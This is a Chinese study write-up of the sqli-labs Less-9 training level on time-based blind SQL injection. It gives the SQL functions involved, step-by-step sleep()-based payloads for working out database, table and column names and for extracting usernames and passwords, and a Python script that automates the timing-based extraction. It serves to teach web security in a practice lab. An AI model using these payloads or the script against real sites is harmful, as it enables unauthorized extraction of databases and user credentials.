Pss-9
这一关考察的是时间盲注
先练习几个常见命令语句:
select sleep(5);--延迟5s输出结果
if (1>0,'ture','false');--输出'ture' / if (1<0,'ture','false');--输出'false'
select ascii('')/select ord('');--返回字符串第一个字符的ascii值
select length('hsgfdsg');--返回字符串长度
select substr/substring/mid('dfgdhd',2,2);--输出fg,无0位
补充知识点:
1、时间盲注:根据页面的响应时间来判断是否存在注入。当联合注入(页面没有回显位置)、报错注入(页面不显示数据库报错信息)、布尔盲注(成功/失败都只显示同一种结果)都不可行时再考虑。
2、步骤:
(1)判断注入点:
?id=1 and if(1,sleep(5),3) ?id=1' and if(1,sleep(5),3) ?id=1" and if(1,sleep(5),3)
(2)判断长度:
?id=1' and if((length(查询语句) =1), sleep(5), 3)
(3)枚举字符
?id=1' and if((ascii(substr(查询语句,1,1)) =1), sleep(5), 3)
3.时间盲注:从网上找的自动化python脚本
-
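"""Time-based blind SQL injection helper for the sqli-labs Less-9 exercise.

Every request yields exactly one bit of information, taken from response
latency alone: a payload whose condition is true makes the database run
``sleep(5)``, so a response slower than ``DELAY_SECONDS`` is read as "true".
The response body is never inspected.
"""
import requests
import time

# Replace with the URL of your own lab level (no query string).
url = "http://0f3687d08b574476ba96442b3ec2c120.app.mituan.zone/Less-9/"

# The delay the payloads request via sleep(), and the threshold used to
# recognise it; the two must stay in step.
DELAY_SECONDS = 5

# Payload used to guess the length of database(); {n} is the candidate length.
payload_len = """?id=1' and if( (length(database()) ={n}) ,sleep(5),3) -- a"""
# Payload used to enumerate database() one character at a time; {n} is the
# 1-based position, {r} the candidate ASCII code.
payload_str = """?id=1' and if( (ascii( substr( (database()) ,{n},1) ) ={r}) , sleep(5), 3) -- a"""


def _condition_holds(url, query):
    """Send one request and report whether the injected condition was true.

    True is returned only when the round trip took longer than DELAY_SECONDS,
    i.e. the database executed sleep(). Network latency alone can also cross
    the threshold, so a single slow response is not a proof.
    """
    start_time = time.time()
    requests.get(url=url + query)
    # Response time = end of the call - start of the call.
    return time.time() - start_time > DELAY_SECONDS


def getLength(url, payload):
    """Return the length of database() by testing lengths 1, 2, 3, ... in turn.

    Args:
        url: Target URL without query string.
        payload: Format string with an ``{n}`` slot for the candidate length
            (the original ignored this argument and used the global instead).

    Returns:
        The first length whose request exceeded DELAY_SECONDS.

    Note:
        There is no upper bound: a target that never delays keeps this loop
        running indefinitely.
    """
    length = 1  # start testing at length 1
    while True:
        if _condition_holds(url, payload.format(n=length)):
            print('测试长度完成,长度为:', length,)
            return length
        print('正在测试长度:', length)
        length += 1  # try the next length


def getStr(url, payload, length):
    """Recover database() character by character.

    Args:
        url: Target URL without query string.
        payload: Format string with ``{n}`` (1-based position) and ``{r}``
            (candidate ASCII code) slots.
        length: Number of characters to recover, as found by getLength().

    Returns:
        The recovered string. A position whose code falls outside 33..125 is
        skipped silently, so the result may be shorter than ``length``.
    """
    result = ''  # recovered name so far
    # Outer loop: one position at a time.
    for pos in range(1, length + 1):
        # Inner loop: every printable ASCII candidate for that position.
        # Note range() stops short of 126 ('~'), as in the original.
        for code in range(33, 126):
            if _condition_holds(url, payload.format(n=pos, r=code)):
                result += chr(code)
                print('第', pos, '个字符猜解成功:', result)
                break
    return result


# Run the guess.
length = getLength(url, payload_len)
getStr(url, payload_str, length)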
无论输入id=1/id=1'/id=1"全部不报错也没有回显,考虑时间盲注
先通过时间函数判断闭合方式,单引号闭合时页面加载了5s
?id=1' and if((length(database())>8),sleep(5),66)--+
到8的时候就不再延迟了,数据库名长度为8
?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),1,1))=117,sleep(5),0)--+
?id=1'and if((ascii(substr(database(),1,1))>100),sleep(5),0)--+
延迟了5s,通过这种方式缩小范围,逐个尝试,第一个字符的ascii值是115,最后得出security
?id=1' and if((select count(table_name) from information_schema.tables where table_schema=database())=4,sleep(5),1)--+
用上面这个判断表的个数,后面的其实只是换了个函数,机理都一样
?id=1' and if(length((select table_name from information_schema.tables where table_schema='security' limit 0,1))=6,sleep(5),0)--+ --1
......
?id=1' and if(length((select table_name from information_schema.tables where table_schema='security' limit 3,1))=5,sleep(5),0)--+ --4
判断表长
?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),1,1))=117,sleep(5),0)--+
表名
?id=1' and if((select count(column_name) from information_schema.columns where table_schema='security' and table_name='users')=3,sleep(5),1)--+
字段
?id=1' and if(length((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1))=2,sleep(5),0)--+
?id=1' and if(ord(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))=105,sleep (5),0)--+
....
?id=1' and if(length((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 2,1))=8,sleep(5),0)--+
?id=1' and if(ord(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 2,1),1,1))=112,sleep (5),0)--+
字段长度,名称
?id=1' and if(ascii(substr((select username from users limit 0,1),1,1))=68,sleep(5),1)--+
?id=1' and if(ascii(substr((select password from users limit 0,1),1,1))=68,sleep(5),1)--+
得username, password
第10关也是时间盲注